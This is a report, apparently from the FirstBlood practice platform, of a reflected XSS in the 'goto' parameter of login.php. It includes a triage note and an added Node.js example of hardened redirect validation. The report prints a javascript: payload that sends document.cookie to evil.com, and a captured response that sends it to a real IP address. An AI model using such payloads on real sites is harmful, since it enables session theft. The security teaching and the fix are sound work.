FirstBlood-#523 — POST-based rXSS on login.php
This issue was discovered on FirstBlood v2
On 2021-10-26, 0x1452 Level 3 reported:
Hey!
I found another way to exploit the goto parameter on the /login.php endpoint.
It doesn't sanitize inputs with a javascript: scheme at all. This allows an attacker to craft a link that will cause XSS after the victim logs in.
To reproduce this, navigate to /login.php?goto=javascript:document.location='http://evil.com?c='%2bdocument.cookie and then log in.
The application will now send a POST request to /login.php that results in the following response:
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Oct 2021 02:58:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: drps=d81c914cb56b895ec86505141; expires=Sun, 31-Oct-2021 02:58:33 GMT; Max-Age=432000; path=/
Content-Length: 115
<script>top.location.href="javascript:document.location='http://159.223.18.143:41328?c='+document.cookie";</script>
The attacker can now extract your session cookie from their server logs:

P3 Medium
Endpoint: /login.php
Parameter: goto
Payload: javascript:document.location='http://evil.com?c='%2bdocument.cookie
FirstBlood ID: 39
Vulnerability Type: Reflective XSS
Our mistake: The parameter "goto" on login.php should have been "fixed" when redirecting to prevent XSS but, due to an oversight from Sean and Karl, the new code did not make it into production. This has since been updated since the event ended and you're recommended to retry. It's related to bug ID 26 because the idea was developers fixed *this* one (when redirecting) but forgot the other reflection.
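A server-side fix of the kind the triage note describes, written here as an added Node.js example; it is not FirstBlood's PHP code, and the function names (vulnerableRedirectBody, safeGotoTarget, redirectResponse) and the placeholder origin are assumptions of this example. The vulnerable template is reconstructed from the response body quoted in the report. The hardened path accepts only a root-relative, same-origin path and sends it in a Location header, so a javascript: value never reaches a script context at all:

```javascript
// Added example, not FirstBlood's code: server-side handling of the post-login
// "goto" parameter from report #523, in Node.js. Function names are my own.

const DEFAULT_TARGET = "/";
// Fixed placeholder origin (assumption of this example); it only serves to
// resolve the candidate and detect inputs that smuggle in a scheme or host.
const BASE = "https://placeholder.invalid";

// Pattern reconstructed from the response body quoted in the report: the goto
// value is dropped verbatim into a script assignment. No quote break-out is
// needed, because assigning a javascript: URL to location.href runs the script.
function vulnerableRedirectBody(rawGoto) {
  return `<script>top.location.href="${rawGoto}";</script>`;
}

// Returns a root-relative, same-origin path derived from `raw`, or
// DEFAULT_TARGET when the value is unacceptable. Anything that is not a plain
// local path (javascript:, data:, https://evil, //evil, /\evil, ...) is
// discarded rather than "cleaned", so there is nothing to re-encode around.
function safeGotoTarget(raw) {
  if (typeof raw !== "string" || raw.length === 0 || raw.length > 2048) {
    return DEFAULT_TARGET;
  }
  // Control characters (tab, newline, ...) are ignored by browsers inside
  // schemes ("java\tscript:"); reject rather than strip.
  if (/[\u0000-\u001F\u007F]/.test(raw)) return DEFAULT_TARGET;
  // Must start with exactly one slash: "//host" is protocol-relative and
  // "/\host" is treated the same way by browsers.
  if (!/^\/(?![\/\\])/.test(raw)) return DEFAULT_TARGET;

  let parsed;
  try {
    parsed = new URL(raw, BASE);
  } catch (e) {
    return DEFAULT_TARGET;
  }
  // If resolution changed the origin, the input contained a scheme or host.
  if (parsed.origin !== BASE) return DEFAULT_TARGET;
  // Dot-segment normalisation can still yield "//host" ("/..//evil.com"
  // resolves to "//evil.com"), which a browser would follow off-site.
  if (/^\/[\/\\]/.test(parsed.pathname)) return DEFAULT_TARGET;

  return parsed.pathname + parsed.search + parsed.hash;
}

// What login.php should emit after a successful login: a 302 with a Location
// header. A header value is never interpreted as script, and the target has
// already been constrained to this origin.
function redirectResponse(rawGoto) {
  return {
    status: 302,
    headers: { Location: safeGotoTarget(rawGoto) },
    body: "",
  };
}

// Demonstration with the payload from the report.
const reportPayload =
  "javascript:document.location='http://evil.com?c='+document.cookie";
console.log("vulnerable body:", vulnerableRedirectBody(reportPayload));
console.log("safe redirect  :", redirectResponse(reportPayload).headers.Location);
console.log("legit target   :", safeGotoTarget("/dashboard.php?tab=1#top"));
```

With the report's payload the hardened path falls back to /, while a genuine local target such as /dashboard.php?tab=1#top passes through unchanged. Note also that the Set-Cookie header in the captured response carries no HttpOnly attribute, which is what lets the injected script read drps through document.cookie; constraining goto removes the injection, and HttpOnly would separately keep the session cookie out of reach of any script that did run.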